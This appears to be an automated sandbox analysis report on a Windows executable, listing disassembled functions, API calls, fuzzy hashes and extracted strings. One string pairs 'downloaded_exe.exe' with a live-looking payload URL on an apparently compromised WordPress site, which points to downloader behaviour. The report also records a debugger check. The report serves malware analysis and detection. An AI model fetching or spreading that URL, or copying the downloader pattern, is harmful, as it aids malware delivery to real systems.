Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: InternetOpen
String ID: downloaded_exe.exe$https://ebitm.co.uk/salah/wp-includes/assets/ping.php$open
API String ID: 2038078732-409003791
Opcode ID: cb1ad4c872fac355c073926329c15deb3908c048405138f85df7fca5948fccd2
Instruction ID: 2d4cc2d82c4a4dc67c6c39ddc6f5f492d98363135eb65aa2da5eeb8532724413
Opcode Fuzzy Hash: cb1ad4c872fac355c073926329c15deb3908c048405138f85df7fca5948fccd2
Instruction Fuzzy Hash: DD413D25A197C298EF20FB60D8543EC5364EBD9788FC01036DA6D0B7D6EE6CD245C3A1

Function 00007FF7FE9A7E10 Relevance: 3.9, APIs: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF7FE9A7E97
memcpy.MSVCRT ref: 00007FF7FE9A7EBB
memcpy.MSVCRT ref: 00007FF7FE9A7EDB

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 51552f25acb949448f3b60623fb330807afa164917187788c076716078f7bca3
Instruction ID: f303347bd85264f31917bfe2df52ad85ae7f42abd1a631b46fb7bad445ffa574
Opcode Fuzzy Hash: 51552f25acb949448f3b60623fb330807afa164917187788c076716078f7bca3
Instruction Fuzzy Hash: B531B362A0A68295DB11EF29D40107DA791AF85FC8FE44431DEAC477D5DE3CD541C3B2

Function 00007FF7FE987630 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 245
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

downloaded_exe.exe, xrefs: 00007FF7FE987630

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: downloaded_exe.exe
API String ID: 0-1849240386
Opcode ID: 451e8970a7f35b9c7a215058aa0873d945f813d905230bcd9563460f5bfe0a3f
Instruction ID: 69c9d276bbace17bc31bb379ec4192da29563dc100c02b4947be20fee09a7816
Opcode Fuzzy Hash: 451e8970a7f35b9c7a215058aa0873d945f813d905230bcd9563460f5bfe0a3f
Instruction Fuzzy Hash: E391BF63A59B4184EB50EF39D4403ACA360FB95F98F984231DEAC573E6DF28D581C3A1

Function 00007FF7FE9A7C10 Relevance: 1.3, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF7FE9A7C44

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: f633c89b93aed962dc625a42e69fecd9086d6f57e630d652fcc128f16039690a
Instruction ID: 28240f5268a8091a0025556396e653bb2cc3fbacbd6ed5c51574cde9d86d59d9
Opcode Fuzzy Hash: f633c89b93aed962dc625a42e69fecd9086d6f57e630d652fcc128f16039690a
Instruction Fuzzy Hash: 8A01D423A0AA4A80DB24EF65D45157CA360AF91FC8FD84031DE9D473D1CE2CD492C3B2

Function 00007FF7FE9BA530 Relevance: 1.3, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00007FF7FE9BA547

Part of subcall function 00007FF7FE9BA630: malloc.MSVCRT ref: 00007FF7FE9BA63F

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 87aa52bfab74579834c76ed5a1a9c89bf8d71e31729cd0b5c2857819ee88c44f
Instruction ID: af663d380a5987a299e7abcd16c3e658e4b9a6bba6bbb1fb9ccc9390f3101806
Opcode Fuzzy Hash: 87aa52bfab74579834c76ed5a1a9c89bf8d71e31729cd0b5c2857819ee88c44f
Instruction Fuzzy Hash: 8AF08260E1A30795FF58F76D681127D92409FC8340FC40434C9AD023C2EEACA28182F2

Non-executed Functions

Function 00007FF7FE90E6C0 Relevance: 38.0, APIs: 25, Instructions: 488sleepCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32 ref: 00007FF7FE90E74B
Sleep.KERNEL32 ref: 00007FF7FE90E762

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: CreateEventSleep
String ID:
API String ID: 3100162736-0
Opcode ID: dce76a0f7f44d647f304f0c375690569dad990a4d488fc7ada199853662cb390
Instruction ID: bac1a6b4e6cf14d13533cc9477f03f3a7fd0ccbdb8c21a776022476fff610120
Opcode Fuzzy Hash: dce76a0f7f44d647f304f0c375690569dad990a4d488fc7ada199853662cb390
Instruction Fuzzy Hash: 40123B22A0960285FF65FB359854379A2A0AFC4B64FD84635DB3D462D5DF3CE881C2B3

Function 00007FF7FE91D1B0 Relevance: 21.4, APIs: 12, Strings: 2, Instructions: 382stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF7FE91D20D
strlen.MSVCRT ref: 00007FF7FE91D223
strlen.MSVCRT ref: 00007FF7FE91D26D
strlen.MSVCRT ref: 00007FF7FE91D2D6
strlen.MSVCRT ref: 00007FF7FE91D33F
strlen.MSVCRT ref: 00007FF7FE91D3AB

Strings

*, xrefs: 00007FF7FE91D74F
basic_string::append, xrefs: 00007FF7FE91D4C2, 00007FF7FE91D4E1, 00007FF7FE91D4ED, 00007FF7FE91D4F9

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: strlen$strcmp
String ID: *$basic_string::append
API String ID: 551667898-3732199748
Opcode ID: 095ddbf4890b46c0663f2fc8b7c174c931447851f3493d21b8f65130e40f91cd
Instruction ID: cec90098f75b514459be55405cd67d3c25073522b15c80e034f0d34a2bb15127
Opcode Fuzzy Hash: 095ddbf4890b46c0663f2fc8b7c174c931447851f3493d21b8f65130e40f91cd
Instruction Fuzzy Hash: 65E19D66B09A5685EB00EF2AD40436EA761BB85FD8F849132DE2D477D5CF3CD44283B2

Function 00007FF7FE901210 Relevance: 20.9, APIs: 8, Strings: 3, Instructions: 1658stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7FE901274

Strings

!, xrefs: 00007FF7FE9031F6
inity, xrefs: 00007FF7FE902BD4
, xrefs: 00007FF7FE902C24

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: strlen
String ID: $!$inity
API String ID: 39653677-2254741344
Opcode ID: aa773bebb866ae177589f34e794ab7dc8d0b797567bac3e23e1a8030b24a7b5e
Instruction ID: 54a36c64eae08bf94cd8b3050c8f9f6ab6ee8b5cf414b2903f9a462daba96790
Opcode Fuzzy Hash: aa773bebb866ae177589f34e794ab7dc8d0b797567bac3e23e1a8030b24a7b5e
Instruction Fuzzy Hash: A9F29D32A0C7868AE760EB25A4403AAF7A1FBC4784FD04136DB59477D9DF7CE4448BA1

Function 00007FF7FE8FD810 Relevance: 15.4, APIs: 4, Strings: 6, Instructions: 350stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 00007FF7FE8FD861
strlen.MSVCRT ref: 00007FF7FE8FD96E

Strings

_, xrefs: 00007FF7FE8FDBF9
Z, xrefs: 00007FF7FE8FD8C7
_, xrefs: 00007FF7FE8FD8BD
_, xrefs: 00007FF7FE8FDA21
Z, xrefs: 00007FF7FE8FDA2E
_GLOBAL_, xrefs: 00007FF7FE8FD857

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: strlenstrncmp
String ID: Z$Z$_$_$_$_GLOBAL_
API String ID: 1310274236-662103887
Opcode ID: cc285ad3dd1e670693836ffaca63711646df89f555e487d9024223a670b61018
Instruction ID: eec7f8b1584f309578c90dd18f41d06635760cce3dcece89592702fa9459266a
Opcode Fuzzy Hash: cc285ad3dd1e670693836ffaca63711646df89f555e487d9024223a670b61018
Instruction Fuzzy Hash: 24F1B132A286C289E720BF3594043ED7BA1BB95748F845131DB7E177C9DF38D66183A0

Function 00007FF7FE90A370 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7FE90A380
GetProcAddress.KERNEL32 ref: 00007FF7FE90A397
LoadLibraryW.KERNEL32 ref: 00007FF7FE90A3BF
GetProcAddress.KERNEL32 ref: 00007FF7FE90A3CF

Strings

rand_s, xrefs: 00007FF7FE90A38D
msvcrt.dll, xrefs: 00007FF7FE90A379
advapi32.dll, xrefs: 00007FF7FE90A3B8
SystemFunction036, xrefs: 00007FF7FE90A3C5

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 25505e7489c74f4b8bd04acb3265e2f2e17138f435b2d35da774da87a01cecef
Instruction ID: c607ad852b3cc06ea2b3afc8ecb5025d69c0931846e6f95faa0821d256a6ee39
Opcode Fuzzy Hash: 25505e7489c74f4b8bd04acb3265e2f2e17138f435b2d35da774da87a01cecef
Instruction Fuzzy Hash: 68F0FF61A1EA2790EF15F715FC400A4B764AF84794BC40536C92D063A4EE6CA545C3F3

Function 00007FF7FE9079C0 Relevance: 12.7, APIs: 8, Instructions: 708COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 00007FF7FE9079E1

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: localeconv
String ID:
API String ID: 3737801528-0
Opcode ID: 1cc4c7b4f3d156f94640c2f78e2704dc573dc64b7c7b3a10ea77437c634cdc9a
Instruction ID: b7f3b1f2bde60bdd49deda2b3575a8eb66ada361f16a1aad12777416ae934da7
Opcode Fuzzy Hash: 1cc4c7b4f3d156f94640c2f78e2704dc573dc64b7c7b3a10ea77437c634cdc9a
Instruction Fuzzy Hash: 5152FD72B092828AEB74EA3494447BEB691EFC5754FD48130DB6A477C5CA3CE94087B2

Function 00007FF7FE9B49E0 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 337COMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00007FF7FE9B4A0E

Strings

%.*Lf, xrefs: 00007FF7FE9B4B08
, xrefs: 00007FF7FE9B4D3F

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: setlocale
String ID: $%.*Lf
API String ID: 1598674530-1256709865
Opcode ID: 6ea6769aa6c39e7ad099e84a399774be49d5be7059806ee2313899b32afa266d
Instruction ID: cb1861b4618bd7fbdf21ea29a0e07afca92a5095795714363aef2f0de036d784
Opcode Fuzzy Hash: 6ea6769aa6c39e7ad099e84a399774be49d5be7059806ee2313899b32afa266d
Instruction Fuzzy Hash: A5D17A22B08A8585EB14EB2AD4443BDA761FBC8F84F844031DFAD177E5DF38E55193A2

Function 00007FF7FE918670 Relevance: 12.1, APIs: 3, Strings: 4, Instructions: 1603COMMON

Download Yara Rule

Strings

uninitialized __any_string, xrefs: 00007FF7FE918CD8, 00007FF7FE91946E
uninitialized __any_string, xrefs: 00007FF7FE918EEE, 00007FF7FE919677
m, xrefs: 00007FF7FE9188BC
std::bad_exception, xrefs: 00007FF7FE91A100

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: m$std::bad_exception$uninitialized __any_string$uninitialized __any_string
API String ID: 0-4007098236
Opcode ID: d2937f500d823daed0396f83a5a0eede3cb023b6e61c0059f809a440d5c26c71
Instruction ID: f3d2c3eda322cf0002bcfb324b50c1a81f7ea77112bbfafde18cc6240ee049ea
Opcode Fuzzy Hash: d2937f500d823daed0396f83a5a0eede3cb023b6e61c0059f809a440d5c26c71
Instruction Fuzzy Hash: C4E22836608BC489D760DB26E4407AEB7A4F789B94F944126EEDC43BA8DF3CD054CB61

Function 00007FF7FE90EEB0 Relevance: 10.6, APIs: 7, Instructions: 108COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007FF7FE90EF67
IsDebuggerPresent.KERNEL32 ref: 00007FF7FE90EF8C
RaiseException.KERNEL32 ref: 00007FF7FE90EFB2
mbstowcs.MSVCRT ref: 00007FF7FE90EFCE
malloc.MSVCRT ref: 00007FF7FE90EFE1
mbstowcs.MSVCRT ref: 00007FF7FE90EFF7
free.MSVCRT ref: 00007FF7FE90F00A

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: freembstowcs$DebuggerExceptionPresentRaisemalloc
String ID:
API String ID: 3725749409-0
Opcode ID: 7968d7878709a490a9c233c799ccd687eae4c1b3c3479ab6f6f55f16f86d5c1a
Instruction ID: eb5bc338270288658aed32b2111662150a71b7c440861b7a5ecb31a635436ee3
Opcode Fuzzy Hash: 7968d7878709a490a9c233c799ccd687eae4c1b3c3479ab6f6f55f16f86d5c1a
Instruction Fuzzy Hash: 53419C61A0D60242FB61FB35A444379E2A4BF85BA0FC44235EF7E077D5DE2CE64086B2

Function 00007FF7FE905FC0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 1475COMMON

Download Yara Rule

Strings

, xrefs: 00007FF7FE90764A
NaN, xrefs: 00007FF7FE906278
Infinity, xrefs: 00007FF7FE9062F8
, xrefs: 00007FF7FE907938

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: $ $Infinity$NaN
API String ID: 0-3274152445
Opcode ID: fbb685925dc3d201d26c236211cf3dc59969695ed0e7d56f427893bfb0e38c6a
Instruction ID: 1bb19c065b10f83255da9434644a461e365d7197cb0e2f31ebc3c9bd63f047b3
Opcode Fuzzy Hash: fbb685925dc3d201d26c236211cf3dc59969695ed0e7d56f427893bfb0e38c6a
Instruction Fuzzy Hash: 2BD28072A1D7818AE751EF35A00076AF7A1FBC0790F904135EB6A47B99DB3DE4408FA1

Function 00007FF7FE9721E0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 195COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF7FE9722A1
basic_string::erase, xrefs: 00007FF7FE97229A

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::erase
API String ID: 0-2652434754
Opcode ID: 3a81422e861ab7ac0536551560b1d32a8da8595ed47356f614ea073836829844
Instruction ID: 40d5ee501e3007d7ab4ab4331e21d6791fadaddb0b081dfd45c5a797d748bc1a
Opcode Fuzzy Hash: 3a81422e861ab7ac0536551560b1d32a8da8595ed47356f614ea073836829844
Instruction Fuzzy Hash: 9471B0B2B25A4684EB10EF29D4442BDA360FBD5BD4F949132DF6C533D4EE28D485C3A1

Function 00007FF7FE938CD0 Relevance: 5.4, Strings: 4, Instructions: 400COMMON

Download Yara Rule

Strings

basic_string::append, xrefs: 00007FF7FE939667, 00007FF7FE9396A0, 00007FF7FE9396C4, 00007FF7FE939725
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF7FE9396EF
basic_string::erase, xrefs: 00007FF7FE9396E8
, xrefs: 00007FF7FE9391B0

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: $%s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append$basic_string::erase
API String ID: 0-3660802673
Opcode ID: a80100a6454c856735ad9da0502aaf46792f8cf779147adfaac60ae2a12197ca
Instruction ID: 1cd8a7a085c6ad79ed1227c95dc3214950d9a7e3e494f09fb6ce015bbc5b3f41
Opcode Fuzzy Hash: a80100a6454c856735ad9da0502aaf46792f8cf779147adfaac60ae2a12197ca
Instruction Fuzzy Hash: 84124932608B8285DB60EF29E4443AAB3A5FBC4B84F904135DAAD077E9DF3CD540D7A1

Function 00007FF7FE939770 Relevance: 5.4, Strings: 4, Instructions: 400COMMON

Download Yara Rule

Strings

, xrefs: 00007FF7FE939C50
basic_string::append, xrefs: 00007FF7FE93A107, 00007FF7FE93A140, 00007FF7FE93A164, 00007FF7FE93A1C5
